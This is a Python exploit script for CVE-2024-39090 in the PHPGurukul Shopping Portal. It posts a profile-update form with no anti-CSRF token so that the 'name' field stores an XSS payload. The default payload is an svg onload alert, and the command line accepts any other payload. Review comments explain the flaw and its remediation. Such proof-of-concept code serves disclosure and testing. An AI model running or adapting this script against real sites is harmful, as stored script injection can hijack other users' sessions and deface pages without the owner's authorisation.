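#!/usr/bin/env python3
#===========================================================
# CSRF to Stored XSS Exploit Script (CVE-2024-39090)
#
#Written by: Arvin Rafael Legaspi
#Date: October 5, 2024
#===========================================================
#
# What this proof of concept exercises: a single form POST carrying the
# fields "name", "contactno" and "update" and no anti-CSRF token. Per the
# title above, the "name" value is then stored and rendered as markup.
#
# NOTE(review): the server-side code is not part of this file. The usual
# remediation for this bug class is to verify a per-session anti-CSRF token
# in the update handler and to HTML-encode the stored name wherever it is
# rendered - confirm both against the patched application.

import argparse

import requests

# Upper bound, in seconds, for the one HTTP request this script sends.
# Without a timeout, requests waits indefinitely on an unresponsive host.
REQUEST_TIMEOUT_SECONDS = 10


def ascii():
    """Print the tool banner.

    NOTE(review): the name shadows the ``ascii`` builtin inside this module;
    it is kept so existing callers keep working.
    """
    print(r"""
  ___ ___ ___ ___   _         ___ _                  _  __  _____ ___
 / __/ __| _ \ __| | |_ ___  / __| |_ ___ _ _ ___ __| | \ \/ / __/ __|
| (__\__ \   / _|  |  _/ _ \ \__ \  _/ _ \ '_/ -_) _` |  >  <\__ \__ \
 \___|___/_|_\_|    \__\___/ |___/\__\___/_| \___\__,_| /_/\_\___/___/
""")


def main():
    """Parse the command line and send the request once.

    ``--url`` is required; ``--payload`` and ``--contactno`` fall back to
    their defaults when omitted.
    """
    ascii()
    parser = argparse.ArgumentParser(
        description="Exploit CSRF to Stored XSS in PHPGurukul Shopping Portal."
    )

    # Only the URL is mandatory; the other two options have defaults.
    parser.add_argument(
        '-u', '--url',
        required=True,
        help="Target URL for the vulnerable endpoint (e.g., http://localhost/shopping/my-account.php)",
    )
    # The value contains a double quote, so the literal is single-quoted.
    parser.add_argument(
        '-p', '--payload',
        type=str,
        default='XSS">You have been hacked.<svg/onload=alert(1)><',
        help='Malicious XSS payload to inject (e.g., XSS">You have been hacked.<svg/onload=alert(1)><)',
    )
    parser.add_argument(
        '-c', '--contactno',
        type=str,
        default='1234567890',
        help="Contact number (optional, default is 1234567890)",
    )

    args = parser.parse_args()

    exploit_csrf_to_xss(args.url, args.payload, args.contactno)


def exploit_csrf_to_xss(target_url, payload, contactno):
    """POST the profile-update form fields to ``target_url`` and report the status.

    Args:
        target_url: URL of the profile-update endpoint.
        payload: value sent in the ``name`` form field.
        contactno: value sent in the ``contactno`` form field.

    Returns:
        None. The outcome is printed to stdout; request errors, including
        timeouts, are caught and printed rather than raised.
    """
    # Field names mirror the profile-update form; "update" is sent empty.
    data = {
        "name": payload,
        "contactno": contactno,
        "update": "",
    }

    try:
        response = requests.post(
            target_url,
            data=data,
            timeout=REQUEST_TIMEOUT_SECONDS,
        )

        print("Response:\n")
        print("=====================================================================")

        # NOTE(review): HTTP 200 only shows that the server answered. It does
        # not prove the field was stored; that has to be confirmed on the
        # rendered profile page.
        if response.status_code == 200:
            print("\nPayload successfully submitted!")
        else:
            print(f"\nFailed to submit the payload. Status code: {response.status_code}")

        print("\n=====================================================================")

    except requests.exceptions.RequestException as e:
        # Covers connection failures, invalid URLs and the timeout above.
        print(f"Error: {e}")


if __name__ == '__main__':
    main()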